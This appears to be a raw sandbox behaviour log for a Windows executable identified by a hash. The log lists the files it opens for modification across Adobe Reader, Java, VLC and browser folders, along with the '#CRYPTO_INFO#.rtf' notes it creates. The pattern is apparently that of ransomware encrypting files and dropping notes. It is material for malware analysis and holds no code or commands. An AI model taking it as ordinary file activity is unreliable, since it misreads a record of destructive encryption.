DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\Xusage.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\keytool.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Close.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\help.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\cmm\CIEXYZ.pf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Mail\wab.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\check.cur 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaTypewriterRegular.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_invite_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-down.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\jabswitch.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\core_visualvm.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\eula.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_RHP.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.servlet_1.1.500.v20140318-1755.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\COPYING.LGPLv2.1.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\README.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\next-arrow-default.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adc_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\index.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\platform.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\external_extensions.json 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_en_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_pwa_launcher.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_es_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\faf_field_grabber.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derby.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_nb_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\illustrations_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\de-de\#CRYPTO_INFO#.rtf 